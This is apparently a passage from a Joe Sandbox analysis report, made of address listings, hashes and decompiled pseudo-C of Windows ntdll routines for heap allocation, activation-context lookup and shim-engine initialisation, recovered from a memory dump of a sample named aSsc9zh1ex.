                                                                                                                              0x1d75d6d1
                                                                                                                              0x1d75d6db
                                                                                                                              0x1d7a9164
                                                                                                                              0x1d7a9164
                                                                                                                              0x00000000
                                                                                                                              0x1d7a9164
                                                                                                                              0x1d75d6e1
                                                                                                                              0x1d75d6ea
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d75d6f3
                                                                                                                              0x1d75d8fc
                                                                                                                              0x1d75d701
                                                                                                                              0x1d75d704
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d75d70a
                                                                                                                              0x1d75d70d
                                                                                                                              0x1d75d922
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d7a9149
                                                                                                                              0x1d7a914e
                                                                                                                              0x1d7a9153
                                                                                                                              0x1d7a9158
                                                                                                                              0x1d7a9158
                                                                                                                              0x1d7a915a
                                                                                                                              0x1d7a915c
                                                                                                                              0x1d7a9161
                                                                                                                              0x00000000
                                                                                                                              0x1d7a9161
                                                                                                                              0x1d75d713
                                                                                                                              0x1d75d716
                                                                                                                              0x1d75d936
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d7a916e
                                                                                                                              0x1d7a9173
                                                                                                                              0x1d7a9178
                                                                                                                              0x00000000
                                                                                                                              0x1d7a9178
                                                                                                                              0x1d75d71c
                                                                                                                              0x1d75d71f
                                                                                                                              0x1d75d723
                                                                                                                              0x1d75d72f
                                                                                                                              0x1d75d73c
                                                                                                                              0x1d75d745
                                                                                                                              0x1d75d749
                                                                                                                              0x1d75d751
                                                                                                                              0x1d75d759
                                                                                                                              0x1d75d768
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d75d76e
                                                                                                                              0x1d75d772
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d75d778
                                                                                                                              0x1d75d77f
                                                                                                                              0x1d75d8f1
                                                                                                                              0x1d75d8f1
                                                                                                                              0x1d7a9370
                                                                                                                              0x1d7a9370
                                                                                                                              0x1d7a937b
                                                                                                                              0x1d7a9380
                                                                                                                              0x1d7a9383
                                                                                                                              0x00000000
                                                                                                                              0x1d7a9383
                                                                                                                              0x1d75d785
                                                                                                                              0x1d75d790
                                                                                                                              0x1d75d790
                                                                                                                              0x1d75d790
                                                                                                                              0x1d75d79a
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d75d7a0
                                                                                                                              0x1d75d7a3
                                                                                                                              0x1d75d7a7
                                                                                                                              0x1d75d80d
                                                                                                                              0x1d75d80d
                                                                                                                              0x1d75d816
                                                                                                                              0x1d75d81c
                                                                                                                              0x1d75d820
                                                                                                                              0x1d75d822
                                                                                                                              0x1d75d826
                                                                                                                              0x1d75d829
                                                                                                                              0x00000000
                                                                                                                              0x1d75d830
                                                                                                                              0x1d75d833
                                                                                                                              0x1d75d85d
                                                                                                                              0x1d75d860
                                                                                                                              0x1d7a92e0
                                                                                                                              0x1d7a92e8
                                                                                                                              0x1d75d941
                                                                                                                              0x1d75d941
                                                                                                                              0x1d75d949
                                                                                                                              0x1d75d94f
                                                                                                                              0x1d75d874
                                                                                                                              0x1d75d874
                                                                                                                              0x1d75d87a
                                                                                                                              0x1d75d884
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d75d886
                                                                                                                              0x1d75d88b
                                                                                                                              0x1d75d83e
                                                                                                                              0x1d75d840
                                                                                                                              0x1d75d891
                                                                                                                              0x1d75d8a5
                                                                                                                              0x1d75d8ac
                                                                                                                              0x1d7a933a
                                                                                                                              0x1d75d8dc
                                                                                                                              0x1d75d8de
                                                                                                                              0x1d7a935b
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d7a9361
                                                                                                                              0x1d75d8e4
                                                                                                                              0x1d75d8eb
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d7a9349
                                                                                                                              0x1d7a9349
                                                                                                                              0x1d7a934d
                                                                                                                              0x00000000
                                                                                                                              0x1d7a934d
                                                                                                                              0x1d7a933a
                                                                                                                              0x1d75d8b2
                                                                                                                              0x1d75d8d2
                                                                                                                              0x1d75d8d6
                                                                                                                              0x1d75d8d8
                                                                                                                              0x1d75d8da
                                                                                                                              0x00000000
                                                                                                                              0x1d75d8da
                                                                                                                              0x1d75d842
                                                                                                                              0x1d75d842
                                                                                                                              0x00000000
                                                                                                                              0x1d75d842
                                                                                                                              0x1d75d955
                                                                                                                              0x1d75d95a
                                                                                                                              0x00000000
                                                                                                                              0x1d75d95a
                                                                                                                              0x1d7a92ee
                                                                                                                              0x1d7a92f2
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d7a92f8
                                                                                                                              0x1d7a92fb
                                                                                                                              0x1d7a9301
                                                                                                                              0x1d7a931f
                                                                                                                              0x1d7a9321
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d7a9327
                                                                                                                              0x1d7a9327
                                                                                                                              0x1d7a932c
                                                                                                                              0x00000000
                                                                                                                              0x1d7a932c
                                                                                                                              0x1d7a9306
                                                                                                                              0x1d7a9313
                                                                                                                              0x1d7a931c
                                                                                                                              0x00000000
                                                                                                                              0x1d7a931c
                                                                                                                              0x1d7a9315
                                                                                                                              0x00000000
                                                                                                                              0x1d7a9315
                                                                                                                              0x1d7a9308
                                                                                                                              0x00000000
                                                                                                                              0x1d7a9308
                                                                                                                              0x1d75d866
                                                                                                                              0x1d75d869
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d75d872
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d75d872
                                                                                                                              0x1d75d835
                                                                                                                              0x1d75d838
                                                                                                                              0x1d7a9366
                                                                                                                              0x00000000
                                                                                                                              0x1d7a9366
                                                                                                                              0x00000000
                                                                                                                              0x1d75d838
                                                                                                                              0x1d75d830
                                                                                                                              0x1d75d7ad
                                                                                                                              0x1d7a917f
                                                                                                                              0x1d7a917f
                                                                                                                              0x1d75d7b3
                                                                                                                              0x1d75d7b8
                                                                                                                              0x1d7a9188
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d7a9194
                                                                                                                              0x1d7a91a5
                                                                                                                              0x1d7a91ac
                                                                                                                              0x1d7a91ae
                                                                                                                              0x1d7a91b0
                                                                                                                              0x1d7a91b7
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d7a91bd
                                                                                                                              0x1d7a91bd
                                                                                                                              0x1d7a91c8
                                                                                                                              0x1d7a91ca
                                                                                                                              0x1d7a91d7
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d7a91e5
                                                                                                                              0x1d7a91e6
                                                                                                                              0x1d7a91ec
                                                                                                                              0x1d7a91f0
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d7a91f2
                                                                                                                              0x1d75d7be
                                                                                                                              0x1d75d7be
                                                                                                                              0x1d75d7c2
                                                                                                                              0x1d75d7c5
                                                                                                                              0x1d7a91f7
                                                                                                                              0x1d7a91fa
                                                                                                                              0x1d7a91fe
                                                                                                                              0x1d7a9213
                                                                                                                              0x1d7a9216
                                                                                                                              0x1d7a921a
                                                                                                                              0x1d7a921d
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d7a921f
                                                                                                                              0x1d7a9224
                                                                                                                              0x1d75d805
                                                                                                                              0x1d75d807
                                                                                                                              0x1d7a9231
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d7a9237
                                                                                                                              0x1d7a923d
                                                                                                                              0x1d7a9244
                                                                                                                              0x1d7a924e
                                                                                                                              0x1d7a9254
                                                                                                                              0x1d7a925c
                                                                                                                              0x1d7a9261
                                                                                                                              0x1d7a9261
                                                                                                                              0x1d7a925c
                                                                                                                              0x1d7a926d
                                                                                                                              0x1d7a926f
                                                                                                                              0x1d7a9274
                                                                                                                              0x1d7a9286
                                                                                                                              0x1d7a9299
                                                                                                                              0x1d7a929f
                                                                                                                              0x1d7a92a1
                                                                                                                              0x1d7a92aa
                                                                                                                              0x1d7a92ae
                                                                                                                              0x1d7a92b0
                                                                                                                              0x1d7a92b0
                                                                                                                              0x1d7a92ae
                                                                                                                              0x1d7a9274
                                                                                                                              0x1d7a92b6
                                                                                                                              0x1d7a92d9
                                                                                                                              0x1d7a92d9
                                                                                                                              0x00000000
                                                                                                                              0x1d7a92b6
                                                                                                                              0x00000000
                                                                                                                              0x1d75d807
                                                                                                                              0x1d75d7cb
                                                                                                                              0x1d75d7d9
                                                                                                                              0x1d75d7e0
                                                                                                                              0x1d75d7e7
                                                                                                                              0x1d75d7ee
                                                                                                                              0x1d75d7fb
                                                                                                                              0x1d75d800
                                                                                                                              0x1d75d803
                                                                                                                              0x1d75d803
                                                                                                                              0x00000000
                                                                                                                              0x1d75d7b8
                                                                                                                              0x00000000
                                                                                                                              0x1d75d790
                                                                                                                              0x00000000
                                                                                                                              0x1d75d902
                                                                                                                              0x1d75d6fb
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000

                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              • SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 1D7A9153
                                                                                                                              • GsHd, xrefs: 1D75D794
                                                                                                                              • Actx , xrefs: 1D7A9315
                                                                                                                              • RtlpFindActivationContextSection_CheckParameters, xrefs: 1D7A914E, 1D7A9173
                                                                                                                              • RtlFindActivationContextSectionGuid() found section at %p (length %lu) which is not a GUID section, xrefs: 1D7A9372
                                                                                                                              • SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 1D7A9178
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000007.00000002.42268320726.000000001D710000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D710000, based on PE: true
                                                                                                                              • Associated: 00000007.00000002.42269843013.000000001D839000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000007.00000002.42269890824.000000001D83D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_7_2_1d710000_aSsc9zh1ex.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: DebugPrintTimes
                                                                                                                              • String ID: Actx $GsHd$RtlFindActivationContextSectionGuid() found section at %p (length %lu) which is not a GUID section$RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.
                                                                                                                              • API String ID: 3446177414-2196497285
                                                                                                                              • Opcode ID: f047fd5f2925b3e760177ff4d5a4a9d6327144128016ea24417815f06f1b29cd
                                                                                                                              • Instruction ID: 6e94f75bb7db45bced90b68a91d53fff7c0fd1487787fa5cbf36d1c498d8ec10
                                                                                                                              • Opcode Fuzzy Hash: f047fd5f2925b3e760177ff4d5a4a9d6327144128016ea24417815f06f1b29cd
                                                                                                                              • Instruction Fuzzy Hash: 91E1B374A04342DFD700CF18C884B6AB7E4BF88724F584A6EE9558B291D771E856CB93
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 1D7EF0A5 Relevance: 12.5, APIs: 1, Strings: 6, Instructions: 231timeCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 62%
                                                                                                                              			E1D7EF0A5(void* __ebx, intOrPtr __ecx, signed int __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t87;
				signed int _t89;
				signed int _t92;
				intOrPtr _t93;
				intOrPtr _t94;
				signed char _t105;
				signed int _t106;
				intOrPtr _t108;
				signed int _t109;
				signed int _t110;
				intOrPtr _t112;
				intOrPtr _t116;
				short* _t134;
				short _t135;
				signed char _t153;
				signed int* _t158;
				short* _t169;
				signed int _t174;
				signed int _t184;
				signed int _t185;
				intOrPtr* _t190;
				void* _t191;

				_push(0x3c);
				_push(0x1d81d320);
				E1D797BE4(__ebx, __edi, __esi);
				_t188 = __ecx;
				 *((intOrPtr*)(_t191 - 0x3c)) = __ecx;
				 *((char*)(_t191 - 0x19)) = 0;
				 *(_t191 - 0x24) = 0;
				if(( *(__ecx + 0x44) & 0x01000000) == 0) {
					 *(_t191 - 4) = 0;
					 *(_t191 - 4) = 1;
					_t87 = E1D737662("RtlAllocateHeap");
					__eflags = _t87;
					if(_t87 == 0) {
						L46:
						 *(_t191 - 0x24) = 0;
						L47:
						 *(_t191 - 4) = 0;
						 *(_t191 - 4) = 0xfffffffe;
						E1D7EF3F9();
						_t89 =  *(_t191 - 0x24);
						goto L48;
					}
					_t153 =  *(__ecx + 0x44) | __edx;
					 *(_t191 - 0x2c) = _t153;
					_t183 = _t153 | 0x10000100;
					 *(_t191 - 0x34) = _t153 | 0x10000100;
					_t174 =  *(_t191 + 8);
					__eflags = _t174;
					 *(_t191 - 0x20) = _t174;
					if(_t174 == 0) {
						 *(_t191 - 0x20) = 1;
					}
					_t92 =  *((intOrPtr*)(_t188 + 0x94)) +  *(_t191 - 0x20) &  *(_t188 + 0x98);
					__eflags = _t92 - 0x10;
					if(_t92 < 0x10) {
						_t92 = 0x10;
					}
					_t93 = _t92 + 8;
					 *((intOrPtr*)(_t191 - 0x40)) = _t93;
					__eflags = _t93 - _t174;
					if(_t93 < _t174) {
						L42:
						_t94 =  *[fs:0x30];
						__eflags =  *(_t94 + 0xc);
						if( *(_t94 + 0xc) == 0) {
							_push("HEAP: ");
							E1D73B910();
						} else {
							E1D73B910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
						}
						_push( *((intOrPtr*)(_t188 + 0x78)));
						E1D73B910("Invalid allocation size - %Ix (exceeded %Ix)\n",  *(_t191 + 8));
						goto L46;
					} else {
						__eflags = _t93 -  *((intOrPtr*)(_t188 + 0x78));
						if(_t93 >  *((intOrPtr*)(_t188 + 0x78))) {
							goto L42;
						}
						__eflags = _t153 & 0x00000001;
						if((_t153 & 0x00000001) == 0) {
							E1D74FED0( *((intOrPtr*)(_t188 + 0xc8)));
							 *((char*)(_t191 - 0x19)) = 1;
							_t183 =  *(_t191 - 0x2c) | 0x10000101;
							__eflags = _t183;
							 *(_t191 - 0x34) = _t183;
						}
						E1D7F0835(_t188, 0);
						_t184 = E1D755D90(_t188, _t188, _t183,  *(_t191 + 8));
						 *(_t191 - 0x24) = _t184;
						_t176 = 1;
						E1D7F0D24(_t188);
						__eflags = _t184;
						if(_t184 == 0) {
							goto L47;
						} else {
							_t185 = _t184 + 0xfffffff8;
							__eflags =  *((char*)(_t185 + 7)) - 5;
							if( *((char*)(_t185 + 7)) == 5) {
								_t185 = _t185 - (( *(_t185 + 6) & 0x000000ff) << 3);
								__eflags = _t185;
							}
							_t158 = _t185;
							 *(_t191 - 0x38) = _t185;
							__eflags =  *(_t188 + 0x4c);
							if( *(_t188 + 0x4c) != 0) {
								 *_t185 =  *_t185 ^  *(_t188 + 0x50);
								__eflags =  *(_t185 + 3) - (_t158[0] ^ _t158[0] ^  *_t158);
								if(__eflags != 0) {
									_push(_t158);
									_t176 = _t185;
									E1D7FD646(0, _t188, _t185, _t185, _t188, __eflags);
								}
							}
							__eflags =  *(_t185 + 2) & 0x00000002;
							if(( *(_t185 + 2) & 0x00000002) == 0) {
								_t105 =  *(_t185 + 3);
								 *(_t191 - 0x1a) = _t105;
								_t106 = _t105 & 0x000000ff;
							} else {
								_t134 = E1D773AE9(_t185);
								 *((intOrPtr*)(_t191 - 0x28)) = _t134;
								__eflags =  *(_t188 + 0x40) & 0x08000000;
								if(( *(_t188 + 0x40) & 0x08000000) == 0) {
									 *_t134 = 0;
								} else {
									_t135 = E1D76FDB9(1, _t176);
									_t169 =  *((intOrPtr*)(_t191 - 0x28));
									 *_t169 = _t135;
									_t134 = _t169;
								}
								_t45 = _t134 + 2; // 0xffff
								_t106 =  *_t45 & 0x0000ffff;
							}
							 *(_t191 - 0x2c) = _t106;
							 *(_t191 - 0x20) = _t106;
							__eflags =  *(_t188 + 0x4c);
							if( *(_t188 + 0x4c) != 0) {
								 *(_t185 + 3) =  *(_t185 + 2) ^  *(_t185 + 1) ^  *_t185;
								 *_t185 =  *_t185 ^  *(_t188 + 0x50);
								__eflags =  *_t185;
							}
							__eflags =  *(_t188 + 0x40) & 0x20000000;
							if(( *(_t188 + 0x40) & 0x20000000) != 0) {
								__eflags = 0;
								E1D7F0835(_t188, 0);
							}
							__eflags =  *(_t191 - 0x24) -  *0x1d8347c0; // 0x0
							_t108 =  *[fs:0x30];
							if(__eflags != 0) {
								_t109 =  *(_t108 + 0x68);
								 *(_t191 - 0x44) = _t109;
								__eflags = _t109 & 0x00000800;
								if((_t109 & 0x00000800) == 0) {
									goto L47;
								}
								_t110 =  *(_t191 - 0x2c);
								__eflags = _t110;
								if(_t110 == 0) {
									goto L47;
								}
								__eflags = _t110 -  *0x1d8347c4; // 0x0
								if(__eflags != 0) {
									goto L47;
								}
								__eflags =  *((intOrPtr*)(_t188 + 0x7c)) -  *0x1d8347c6; // 0x0
								if(__eflags != 0) {
									goto L47;
								}
								_t112 =  *[fs:0x30];
								__eflags =  *(_t112 + 0xc);
								if( *(_t112 + 0xc) == 0) {
									_push("HEAP: ");
									E1D73B910();
								} else {
									E1D73B910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
								}
								_push(E1D7E823A(_t188,  *(_t191 - 0x20)));
								_push( *(_t191 + 8));
								E1D73B910("Just allocated block at %p for 0x%Ix bytes with tag %ws\n",  *(_t191 - 0x24));
								goto L32;
							} else {
								__eflags =  *(_t108 + 0xc);
								if( *(_t108 + 0xc) == 0) {
									_push("HEAP: ");
									E1D73B910();
								} else {
									E1D73B910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
								}
								_push( *(_t191 + 8));
								E1D73B910("Just allocated block at %p for %Ix bytes\n",  *0x1d8347c0);
								L32:
								_t116 =  *[fs:0x30];
								__eflags =  *((char*)(_t116 + 2));
								if( *((char*)(_t116 + 2)) != 0) {
									 *0x1d8347a1 = 1;
									 *0x1d834100 = 0;
									asm("int3");
									 *0x1d8347a1 = 0;
								}
								goto L47;
							}
						}
					}
				} else {
					_t190 =  *0x1d833748; // 0x0
					 *0x1d8391e0(__ecx, __edx,  *(_t191 + 8));
					_t89 =  *_t190();
					L48:
					 *[fs:0x0] =  *((intOrPtr*)(_t191 - 0x10));
					return _t89;
				}
			}

























                                                                                                                              0x1d7ef0a5
                                                                                                                              0x1d7ef0a7
                                                                                                                              0x1d7ef0ac
                                                                                                                              0x1d7ef0b3
                                                                                                                              0x1d7ef0b5
                                                                                                                              0x1d7ef0ba
                                                                                                                              0x1d7ef0bd
                                                                                                                              0x1d7ef0c7
                                                                                                                              0x1d7ef0e3
                                                                                                                              0x1d7ef0e6
                                                                                                                              0x1d7ef0f4
                                                                                                                              0x1d7ef0f9
                                                                                                                              0x1d7ef0fb
                                                                                                                              0x1d7ef3d2
                                                                                                                              0x1d7ef3d2
                                                                                                                              0x1d7ef3d5
                                                                                                                              0x1d7ef3d5
                                                                                                                              0x1d7ef3d8
                                                                                                                              0x1d7ef3df
                                                                                                                              0x1d7ef3e4
                                                                                                                              0x00000000
                                                                                                                              0x1d7ef3e4
                                                                                                                              0x1d7ef104
                                                                                                                              0x1d7ef106
                                                                                                                              0x1d7ef10b
                                                                                                                              0x1d7ef111
                                                                                                                              0x1d7ef114
                                                                                                                              0x1d7ef117
                                                                                                                              0x1d7ef119
                                                                                                                              0x1d7ef11c
                                                                                                                              0x1d7ef11e
                                                                                                                              0x1d7ef11e
                                                                                                                              0x1d7ef12e
                                                                                                                              0x1d7ef134
                                                                                                                              0x1d7ef137
                                                                                                                              0x1d7ef13b
                                                                                                                              0x1d7ef13b
                                                                                                                              0x1d7ef13c
                                                                                                                              0x1d7ef13f
                                                                                                                              0x1d7ef142
                                                                                                                              0x1d7ef144
                                                                                                                              0x1d7ef350
                                                                                                                              0x1d7ef350
                                                                                                                              0x1d7ef356
                                                                                                                              0x1d7ef359
                                                                                                                              0x1d7ef378
                                                                                                                              0x1d7ef37d
                                                                                                                              0x1d7ef35b
                                                                                                                              0x1d7ef370
                                                                                                                              0x1d7ef375
                                                                                                                              0x1d7ef383
                                                                                                                              0x1d7ef38e
                                                                                                                              0x00000000
                                                                                                                              0x1d7ef14a
                                                                                                                              0x1d7ef14a
                                                                                                                              0x1d7ef14d
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d7ef153
                                                                                                                              0x1d7ef156
                                                                                                                              0x1d7ef15e
                                                                                                                              0x1d7ef163
                                                                                                                              0x1d7ef16a
                                                                                                                              0x1d7ef16a
                                                                                                                              0x1d7ef170
                                                                                                                              0x1d7ef170
                                                                                                                              0x1d7ef177
                                                                                                                              0x1d7ef186
                                                                                                                              0x1d7ef188
                                                                                                                              0x1d7ef18b
                                                                                                                              0x1d7ef18f
                                                                                                                              0x1d7ef194
                                                                                                                              0x1d7ef196
                                                                                                                              0x00000000
                                                                                                                              0x1d7ef19c
                                                                                                                              0x1d7ef19c
                                                                                                                              0x1d7ef19f
                                                                                                                              0x1d7ef1a3
                                                                                                                              0x1d7ef1ac
                                                                                                                              0x1d7ef1ac
                                                                                                                              0x1d7ef1ac
                                                                                                                              0x1d7ef1ae
                                                                                                                              0x1d7ef1b0
                                                                                                                              0x1d7ef1b3
                                                                                                                              0x1d7ef1b6
                                                                                                                              0x1d7ef1bb
                                                                                                                              0x1d7ef1c5
                                                                                                                              0x1d7ef1c8
                                                                                                                              0x1d7ef1ca
                                                                                                                              0x1d7ef1cb
                                                                                                                              0x1d7ef1cf
                                                                                                                              0x1d7ef1cf
                                                                                                                              0x1d7ef1c8
                                                                                                                              0x1d7ef1d4
                                                                                                                              0x1d7ef1d8
                                                                                                                              0x1d7ef208
                                                                                                                              0x1d7ef20b
                                                                                                                              0x1d7ef20e
                                                                                                                              0x1d7ef1da
                                                                                                                              0x1d7ef1dc
                                                                                                                              0x1d7ef1e1
                                                                                                                              0x1d7ef1e6
                                                                                                                              0x1d7ef1ed
                                                                                                                              0x1d7ef1ff
                                                                                                                              0x1d7ef1ef
                                                                                                                              0x1d7ef1f0
                                                                                                                              0x1d7ef1f5
                                                                                                                              0x1d7ef1f8
                                                                                                                              0x1d7ef1fb
                                                                                                                              0x1d7ef1fb
                                                                                                                              0x1d7ef202
                                                                                                                              0x1d7ef202
                                                                                                                              0x1d7ef202
                                                                                                                              0x1d7ef211
                                                                                                                              0x1d7ef214
                                                                                                                              0x1d7ef218
                                                                                                                              0x1d7ef21b
                                                                                                                              0x1d7ef227
                                                                                                                              0x1d7ef22d
                                                                                                                              0x1d7ef22d
                                                                                                                              0x1d7ef22d
                                                                                                                              0x1d7ef22f
                                                                                                                              0x1d7ef236
                                                                                                                              0x1d7ef238
                                                                                                                              0x1d7ef23c
                                                                                                                              0x1d7ef23c
                                                                                                                              0x1d7ef244
                                                                                                                              0x1d7ef24a
                                                                                                                              0x1d7ef250
                                                                                                                              0x1d7ef2be
                                                                                                                              0x1d7ef2c1
                                                                                                                              0x1d7ef2c4
                                                                                                                              0x1d7ef2c9
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d7ef2cf
                                                                                                                              0x1d7ef2d2
                                                                                                                              0x1d7ef2d5
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d7ef2db
                                                                                                                              0x1d7ef2e2
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d7ef2ec
                                                                                                                              0x1d7ef2f3
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d7ef2f9
                                                                                                                              0x1d7ef2ff
                                                                                                                              0x1d7ef302
                                                                                                                              0x1d7ef321
                                                                                                                              0x1d7ef326
                                                                                                                              0x1d7ef304
                                                                                                                              0x1d7ef319
                                                                                                                              0x1d7ef31e
                                                                                                                              0x1d7ef337
                                                                                                                              0x1d7ef338
                                                                                                                              0x1d7ef343
                                                                                                                              0x00000000
                                                                                                                              0x1d7ef252
                                                                                                                              0x1d7ef252
                                                                                                                              0x1d7ef255
                                                                                                                              0x1d7ef274
                                                                                                                              0x1d7ef279
                                                                                                                              0x1d7ef257
                                                                                                                              0x1d7ef26c
                                                                                                                              0x1d7ef271
                                                                                                                              0x1d7ef27f
                                                                                                                              0x1d7ef28d
                                                                                                                              0x1d7ef295
                                                                                                                              0x1d7ef295
                                                                                                                              0x1d7ef29b
                                                                                                                              0x1d7ef29f
                                                                                                                              0x1d7ef2a5
                                                                                                                              0x1d7ef2ac
                                                                                                                              0x1d7ef2b2
                                                                                                                              0x1d7ef2b3
                                                                                                                              0x1d7ef2b3
                                                                                                                              0x00000000
                                                                                                                              0x1d7ef29f
                                                                                                                              0x1d7ef250
                                                                                                                              0x1d7ef196
                                                                                                                              0x1d7ef0c9
                                                                                                                              0x1d7ef0ce
                                                                                                                              0x1d7ef0d6
                                                                                                                              0x1d7ef0dc
                                                                                                                              0x1d7ef3e7
                                                                                                                              0x1d7ef3ea
                                                                                                                              0x1d7ef3f6
                                                                                                                              0x1d7ef3f6

                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000007.00000002.42268320726.000000001D710000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D710000, based on PE: true
                                                                                                                              • Associated: 00000007.00000002.42269843013.000000001D839000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000007.00000002.42269890824.000000001D83D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_7_2_1d710000_aSsc9zh1ex.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: DebugPrintTimes
                                                                                                                              • String ID: HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just allocated block at %p for %Ix bytes$Just allocated block at %p for 0x%Ix bytes with tag %ws$RtlAllocateHeap
                                                                                                                              • API String ID: 3446177414-1745908468
                                                                                                                              • Opcode ID: 182e3c98e04aa22d5bb9aa2655f137d9dd311d1085d7941096d0707585a69e06
                                                                                                                              • Instruction ID: 9f9071dcc4e9ac927a26abf586ef227dfff357ec3482b099543815172905ec3c
                                                                                                                              • Opcode Fuzzy Hash: 182e3c98e04aa22d5bb9aa2655f137d9dd311d1085d7941096d0707585a69e06
                                                                                                                              • Instruction Fuzzy Hash: 1991033A904645EFCB02CFA8D4446ADFBF2FF49370F05845AE4499B662C736A940CB12
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 1D73640D Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 150timeCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 46%
                                                                                                                              			E1D73640D(void* __ecx) {
				signed int _v8;
				void* _v12;
				void* _v536;
				void* _v548;
				char _v780;
				char* _v784;
				char _v788;
				char _v792;
				intOrPtr _v804;
				char _v868;
				char* _v872;
				short _v874;
				char _v876;
				void* _v880;
				char _v892;
				void* _v896;
				void* _v900;
				void* _v904;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				short _t48;
				short _t49;
				void* _t52;
				signed char _t61;
				void* _t67;
				intOrPtr _t71;
				void* _t81;
				signed char _t85;
				void* _t99;
				void* _t100;
				void* _t102;
				void* _t103;
				signed int _t104;
				signed int _t106;
				signed int _t108;
				void* _t109;

				_t108 = (_t106 & 0xfffffff8) - 0x374;
				_v8 =  *0x1d83b370 ^ _t108;
				_t48 = 0x16;
				_v876 = _t48;
				_t96 =  &_v876;
				_t49 = 0x18;
				_v874 = _t49;
				_t99 = __ecx;
				_v872 = L"apphelp.dll";
				_v784 =  &_v780;
				_v788 = 0x1000000;
				_v780 = 0;
				_t52 = E1D736C11( &_v788,  &_v876, _t109);
				if(_t52 < 0) {
					_t85 =  *0x1d8337c0; // 0x0
					__eflags = _t85 & 0x00000003;
					if((_t85 & 0x00000003) == 0) {
						L12:
						__eflags = _t85 & 0x00000010;
						L15:
						if(__eflags != 0) {
							asm("int3");
						}
						L6:
						_t53 =  &_v780;
						if( &_v780 != _v784) {
							_t53 = E1D73BA80(_v784);
						}
						_pop(_t100);
						_pop(_t102);
						_pop(_t81);
						return E1D784B50(_t53, _t81, _v8 ^ _t108, _t96, _t100, _t102);
					}
					_push(_t52);
					_push("Building shim engine DLL system32 filename failed with status 0x%08lx\n");
					_push(0);
					_push("LdrpInitShimEngine");
					_push(0xa35);
					L11:
					_push("minkernel\\ntdll\\ldrinit.c");
					E1D7BE692();
					_t85 =  *0x1d8337c0; // 0x0
					_t108 = _t108 + 0x18;
					goto L12;
				}
				E1D75E8A6(0, 0x4001,  &_v868);
				_t96 =  &_v872;
				_t103 = E1D736B45( &_v792,  &_v872, 0,  &_v892);
				if(_v804 != 0) {
					E1D76E7E0( &_v792, _v868);
				}
				_t112 = _t103;
				if(_t103 < 0) {
					_t61 =  *0x1d8337c0; // 0x0
					__eflags = _t61 & 0x00000003;
